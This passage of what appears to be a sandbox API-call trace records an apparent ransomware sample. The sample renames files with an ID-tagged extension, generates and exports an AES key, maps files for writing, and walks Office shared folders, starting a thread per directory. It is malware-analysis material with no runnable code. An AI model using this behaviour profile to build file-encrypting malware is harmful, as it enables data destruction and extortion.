Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.654] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0058.655] CreateFileMappingA (hFile=0x544, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xcb8 [0058.655] CryptAcquireContextA (in: phProv=0x468fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x468fcec*=0x10e27d78) returned 1 [0060.234] CryptGenKey (in: hProv=0x10e27d78, Algid=0x6610, dwFlags=0x1, phKey=0x468fce8 | out: phKey=0x468fce8*=0x10f145c0) returned 1 [0060.234] CryptExportKey (in: hKey=0x10f145c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x468fbe4, pdwDataLen=0x468fce4 | out: pbData=0x468fbe4*, pdwDataLen=0x468fce4*=0x2c) returned 1 [0060.234] MapViewOfFile (hFileMappingObject=0xcb8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x3d50000 Thread: id = 129 os_tid = 0x8c0 [0040.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*", lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a58b0 [0040.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.174] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.174] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.174] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DAO", cAlternateFileName="")) returned 1 [0040.174] lstrcmpW (lpString1=".", lpString2="DAO") returned -1 [0040.174] lstrcmpW (lpString1="..", lpString2="DAO") returned -1 [0040.174] lstrcmpiW (lpString1="windows", lpString2="DAO") returned 1 [0040.174] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.174] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.175] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="DAO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" [0040.175] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*" [0040.175] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94f0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.175] CloseHandle (hObject=0x234) returned 1 [0040.175] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60d54030, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0040.175] lstrcmpW (lpString1=".", lpString2="Help") returned -1 [0040.175] lstrcmpW (lpString1="..", lpString2="Help") returned -1 [0040.175] lstrcmpiW (lpString1="windows", lpString2="Help") returned 1 [0040.177] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.177] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.177] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="Help" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" [0040.177] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0040.177] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10bde528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.178] CloseHandle (hObject=0x234) returned 1 [0040.178] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa21d9876, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0040.178] lstrcmpW (lpString1=".", lpString2="ink") returned -1 [0040.178] lstrcmpW (lpString1="..", lpString2="ink") returned -1 [0040.178] lstrcmpiW (lpString1="windows", lpString2="ink") returned 1 [0040.180] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.180] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.180] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="ink" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" [0040.180] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0040.180] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10bf6590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.181] CloseHandle (hObject=0x234) returned 1 [0040.181] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSEnv", cAlternateFileName="")) returned 1 [0040.181] lstrcmpW (lpString1=".", lpString2="MSEnv") returned -1 [0040.181] lstrcmpW (lpString1="..", lpString2="MSEnv") returned -1 [0040.181] lstrcmpiW (lpString1="windows", lpString2="MSEnv") returned 1 [0040.183] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.183] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.183] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="MSEnv" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" [0040.183] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*" [0040.183] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.183] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c0e5f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.184] CloseHandle (hObject=0x234) returned 1 [0040.184] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0040.184] lstrcmpW (lpString1=".", lpString2="MSInfo") returned -1 [0040.184] lstrcmpW (lpString1="..", lpString2="MSInfo") returned -1 [0040.184] lstrcmpiW (lpString1="windows", lpString2="MSInfo") returned 1 [0040.186] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.186] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.186] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="MSInfo" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" [0040.186] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*" [0040.186] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c26660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.187] CloseHandle (hObject=0x234) returned 1 [0040.187] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xb30acfc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb30acfc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0040.187] lstrcmpW (lpString1=".", lpString2="OFFICE14") returned -1 [0040.187] lstrcmpW (lpString1="..", lpString2="OFFICE14") returned -1 [0040.187] lstrcmpiW (lpString1="windows", lpString2="OFFICE14") returned 1 [0040.189] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.189] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.189] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="OFFICE14" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" [0040.189] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*" [0040.189] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c3e6c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.190] CloseHandle (hObject=0x234) returned 1 [0040.190] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xadf4bfa0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Portal", cAlternateFileName="")) returned 1 [0040.190] lstrcmpW (lpString1=".", lpString2="Portal") returned -1 [0040.190] lstrcmpW (lpString1="..", lpString2="Portal") returned -1 [0040.190] lstrcmpiW (lpString1="windows", lpString2="Portal") returned 1 [0040.192] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.192] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="Portal" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" [0040.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" [0040.192] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c56730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.193] CloseHandle (hObject=0x234) returned 1 [0040.193] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8132bc53, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8132bc53, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0040.193] lstrcmpW (lpString1=".", lpString2="Stationery") returned -1 [0040.193] lstrcmpW (lpString1="..", lpString2="Stationery") returned -1 [0040.193] lstrcmpiW (lpString1="windows", lpString2="Stationery") returned 1 [0040.195] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.195] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="Stationery" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" [0040.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0040.195] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c6e798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.196] CloseHandle (hObject=0x234) returned 1 [0040.196] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0040.196] lstrcmpW (lpString1=".", lpString2="TextConv") returned -1 [0040.196] lstrcmpW (lpString1="..", lpString2="TextConv") returned -1 [0040.196] lstrcmpiW (lpString1="windows", lpString2="TextConv") returned 1 [0040.198] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.198] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="TextConv" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" [0040.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*" [0040.198] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c86800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.199] CloseHandle (hObject=0x234) returned 1 [0040.199] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0040.199] lstrcmpW (lpString1=".", lpString2="Triedit") returned -1 [0040.199] lstrcmpW (lpString1="..", lpString2="Triedit") returned -1 [0040.199] lstrcmpiW (lpString1="windows", lpString2="Triedit") returned 1 [0040.201] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.201] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.201] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="Triedit" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" [0040.201] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*" [0040.201] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c9e868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.202] CloseHandle (hObject=0x234) returned 1 [0040.202] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0040.202] lstrcmpW (lpString1=".", lpString2="VBA") returned -1 [0040.202] lstrcmpW (lpString1="..", lpString2="VBA") returned -1 [0040.202] lstrcmpiW (lpString1="windows", lpString2="VBA") returned 1 [0040.203] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.204] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="VBA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" [0040.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*" [0040.204] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10cb68d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.205] CloseHandle (hObject=0x234) returned 1 [0040.205] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xcc379b80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xcc379b80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, 